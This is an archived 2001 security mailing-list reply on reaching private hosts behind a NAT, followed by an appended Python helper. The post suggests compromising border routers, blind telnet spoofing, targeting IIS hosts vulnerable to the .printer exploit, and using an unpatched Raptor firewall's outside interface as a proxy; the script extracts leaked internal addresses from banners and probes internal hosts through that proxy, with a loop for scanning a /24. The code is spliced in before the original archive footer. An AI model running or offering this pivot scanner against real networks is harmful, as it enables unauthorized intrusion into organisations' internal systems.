> One would conclude that one of these is being used for NAT for
> internal.company.com - but where do I go from here.

...using this information, strategies I would suggest would include:

- compromising the Cisco or the Wellfleet and, if they provide common
  utilities (telnet, tftp, ftp etc.), using them as a springboard into the
  RFC1918-addressed portion of the target's network. Of course, if they
  aren't answering internet-sourced connection requests you're out of luck.
  If you knew that they accepted telnet connections from, say, 192.168.1.1
  then you could try a blind spoofing attack on telnet...

- compromising a non-RFC1918-addressed host on the target's network and
  exploring to see if routing is configured to allow /this/ to be a
  springboard. I would currently suggest a UNIX box or a Win2K/IIS5
  SP0/SP1 host (vulnerable to the ISAPI .printer exploit) as being
  valuable target hosts.

If the network is protected by a Raptor firewall v6.5 unpatched, you could try
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2517
and, using the outside interface of the firewall as a proxy, scan the internal
RFC1918 hosts behind it.

As an example, one time I found a www server at address 255.255.255.130 (IP
addresses changed to protect the innocent - domain name changed to
customer.com) that when banner-grabbed replied with:

+ 255.255.255.130
  |___ 80 World Wide Web HTTP
       |___ HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Content-Location: http://10.0.0.6/index.htm..

After that, I scanned the rest of the network and found:

* - 255.255.255.127
* - 255.255.255.128
* + 255.255.255.129
  |___ 7 Echo
  |___ 2001 Cisco router management
  |___ ............
  |___ 9001 Cisco xremote
  |___ ............
- 255.255.255.125
- 255.255.255.126
+ 255.255.255.130
  |___ 80 World Wide Web HTTP
       |___ HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Content-Location: http://10.0.0.6/index.htm..
- 255.255.255.131
+ 255.255.255.132
  |___ 21 File Transfer Protocol [Control]
       |___ 500 proxy access denied..
  |___ 22 SSH Remote Login Protocol
  |___ 25 Simple Mail Transfer
       |___ 220 cusfw01 NT smtp-gw is ready...
  |___ 53 Domain Name Server
  |___ 80 World Wide Web HTTP
       |___ HTTP/1.0 404 Error..Content-type: text/html....<h1>Error - 404</h1><HR><PRE>Cannot resolve destination<br></PRE><br><HR>Http Proxy</br>
  |___ 110 Post Office Protocol - Version 3
       |___ +OK customer.com POP MDaemon 3.5.3 ready <MDAEMON-XXXXXXXXXXXXX.XXXXXXXXXXXXXXat_private>..

The .129 is their border router. The Raptor is sitting at .132. The web
server is NATted at .130 and MS is happy telling us the internal addressing
scheme. After that, it was easy to scan the internal net using the Raptor as
a proxy and we found out some interesting servers at the other side of the
fw . . . . ;)

hope this helps!

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
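The two steps the post walks through (spotting the pre-NAT address that IIS leaks in its Content-Location header, then asking the firewall's outside-interface HTTP proxy to fetch internal hosts and reading the reply to tell "forwarded" from "refused") as an added example; this is not code from the original post, from Raptor, or from any scanner it mentions. The sample replies below are constructed from the banner strings quoted above, the header names checked beyond Content-Location and the reply-classification rules are assumptions made here for illustration, and `probe_via_proxy` is the one function that touches the network.

```python
"""Banner-leak triage and HTTP-proxy pivot helper (added example, not from the post)."""
import ipaddress
import re
import socket
from typing import Dict, List

# RFC 1918 ranges, spelled out rather than relying on ipaddress.is_private
# (which also covers loopback, link-local and other non-1918 space).
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Headers that carry a URL. Content-Location is the one the post shows leaking;
# Location is an assumption added here (redirects leak the same way).
URL_HEADERS = ("content-location", "location")
_IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_headers(raw: str) -> Dict[str, str]:
    """Turn an HTTP reply (status line first) into a lowercase header dict."""
    headers: Dict[str, str] = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def leaked_private_addresses(raw_reply: str) -> List[str]:
    """Return RFC 1918 addresses found in URL-bearing headers of a reply.

    The post's IIS host answered 'Content-Location: http://10.0.0.6/index.htm',
    giving away its real address behind the NAT.
    """
    found: List[str] = []
    for name, value in parse_headers(raw_reply).items():
        if name not in URL_HEADERS:
            continue
        for ip_str in _IP_RE.findall(value):
            try:
                ip = ipaddress.ip_address(ip_str)
            except ValueError:
                continue
            if any(ip in net for net in RFC1918) and str(ip) not in found:
                found.append(str(ip))
    return found


def build_proxy_get(internal_host: str, path: str = "/") -> bytes:
    """Absolute-URI GET: a forward proxy fetches the named host on our behalf."""
    return (f"GET http://{internal_host}{path} HTTP/1.0\r\n"
            f"Host: {internal_host}\r\n\r\n").encode()


def classify_proxy_reply(raw: str) -> str:
    """'unreachable', 'denied', 'forwarded:<Server>' or 'unknown'.

    The two error strings are the ones quoted in the post's scan output; treating
    any other reply that carries a Server header as the internal host's own
    answer is an assumption made here.
    """
    low = raw.lower()
    if "cannot resolve destination" in low:
        return "unreachable"
    if "proxy access denied" in low:
        return "denied"
    headers = parse_headers(raw)
    if raw.lstrip().startswith("HTTP/") and "server" in headers:
        return "forwarded:" + headers["server"]
    return "unknown"


def probe_via_proxy(proxy_ip: str, proxy_port: int, internal_host: str, timeout: float = 5.0) -> str:
    """Send one proxied GET to the firewall's outside interface and classify the reply."""
    with socket.create_connection((proxy_ip, proxy_port), timeout=timeout) as s:
        s.sendall(build_proxy_get(internal_host))
        data = b""
        while len(data) < 4096:
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
    return classify_proxy_reply(data.decode("latin-1", "replace"))


# Constructed samples modelled on the banners quoted in the post (not real captures).
SAMPLE_NATTED_BANNER = ("HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n"
                        "Content-Location: http://10.0.0.6/index.htm\r\n\r\n")
SAMPLE_PROXY_404 = ("HTTP/1.0 404 Error\r\nContent-type: text/html\r\n\r\n"
                    "<h1>Error - 404</h1><HR><PRE>Cannot resolve destination<br></PRE><br><HR>Http Proxy</br>")
SAMPLE_FTP_DENIED = "500 proxy access denied.."

if __name__ == "__main__":
    print(leaked_private_addresses(SAMPLE_NATTED_BANNER))   # ['10.0.0.6']
    print(classify_proxy_reply(SAMPLE_PROXY_404))           # unreachable
    print(build_proxy_get("10.0.0.6").decode())
```

Once a leaked address such as 10.0.0.6 is known, the loop a practitioner would run is `probe_via_proxy(firewall_outside_ip, 80, host)` over the surrounding /24: "unreachable" means the proxy accepted the request but nothing answered, "denied" means it refused to forward, and a "forwarded:" result is the internal host's own banner. Keep the timeout short, since a proxy that silently drops internal requests looks identical to a slow host.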
This archive was generated by hypermail 2b30 : Thu May 24 2001 - 07:15:25 PDT